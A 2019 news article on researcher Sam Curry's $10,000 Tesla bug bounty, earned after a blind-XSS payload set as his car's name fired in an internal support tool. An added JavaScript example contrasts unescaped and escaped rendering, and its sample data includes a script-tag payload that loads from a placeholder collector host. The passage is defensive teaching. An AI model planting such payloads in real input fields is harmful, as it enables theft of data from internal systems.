Published on July 17th, 2019
Cracked Tesla 3 Windshield Leads to $10,000 Bug Bounty
Tesla paid a large bug bounty for a cross-site scripting (XSS) vulnerability in one of its backend apps that allowed gleaning vital statistics about a vehicle.
A hacker and web application security researcher, also an owner of a Tesla 3, found the bug by chance after trying to test its defenses against various attacks.
Sam Curry initially tried to see if the car was vulnerable to format string attacks and named it ‘%x.%x.%x.%x’, but nothing happened.
Multiple attempts later, he noticed that the car supported a long string of characters and decided to give it the name of a payload he had set up through the XSS Hunter automated test service.
He kept poking around to no avail and finally called it quits. One day in June, a rock cracked the windshield of Curry’s Tesla and he set up an appointment for a replacement.
After getting a reply that someone was looking into his request, Curry checked XSS Hunter and found that the Tesla agent had fired the blind-XSS payload and data was coming in as a result.
The context was a Tesla subdomain that offered access to current information about the car, which included speed, temperature, firmware version, tire pressure, local timezone, and lock state.
Trying to reach the vulnerable subdomain resulted in failure as it was probably restricted for internal use.
The researcher assumes that the vulnerable web app’s functionality relies on “the different hyperlinks within the DOM [interface].”
Live support agents can interact with the car by sending updates and most likely change its configuration, Curry said in a blog post this week.
This may have allowed them to create a request that initiated a specific action that could lead to retrieving information about both the car and the customer.
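The failure mode described above, a customer-chosen vehicle name rendered unencoded in an internal support page, is shown next beside its output-encoded fix, with a check that flags stored names whose rendering would add markup. This is an added example, not code from Tesla or from Curry's write-up; the record fields, template and sample names are constructed assumptions.

```javascript
// Added example: field names, template and sample records are hypothetical.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can change the HTML parsing context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the customer-controlled name is concatenated into markup.
function renderVehicleCardUnsafe(vehicle) {
  return `<div class="vehicle"><h2>${vehicle.name}</h2><span>${vehicle.firmware}</span></div>`;
}

// Hardened pattern: every field is encoded at the point of output.
function renderVehicleCardSafe(vehicle) {
  return `<div class="vehicle"><h2>${escapeHtml(vehicle.name)}</h2>` +
         `<span>${escapeHtml(vehicle.firmware)}</span></div>`;
}

// True when the rendered HTML contains an element the template itself never emits.
const TEMPLATE_TAGS = ['div', 'h2', 'span'];
function introducesElements(html) {
  const opened = html.match(/<\s*[a-zA-Z][a-zA-Z0-9]*/g) || [];
  return opened
    .map((tag) => tag.replace(/<\s*/, '').toLowerCase())
    .some((tag) => !TEMPLATE_TAGS.includes(tag));
}

// Audit stored records: which names would alter the page if rendered unencoded?
function auditNames(vehicles) {
  return vehicles
    .filter((v) => introducesElements(renderVehicleCardUnsafe(v)))
    .map((v) => v.name);
}

// Constructed sample records; the second name carries markup pointing at a
// reserved .invalid host, standing in for a blind-XSS probe.
const SAMPLE_VEHICLES = [
  { name: '%x.%x.%x.%x', firmware: '2019.20.1' },
  { name: '"><script src="https://collector.example.invalid/x.js"></script>', firmware: '2019.20.1' },
  { name: "Sam's Model 3", firmware: '2019.20.1' },
];

console.log('names needing review:', auditNames(SAMPLE_VEHICLES));
```

Encoding at output matters here because the name is stored in one system and rendered later in another, so input checks in the customer-facing app do not protect the internal tool.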
Curry reported the problem to Tesla through the Bugcrowd bug bounty platform on June 20, and the company acknowledged the bug and rolled out a hotfix within about half a day.
There was no mention of a reward in the message Tesla sent to Curry, but the researcher received a bounty of $10,000 two weeks later.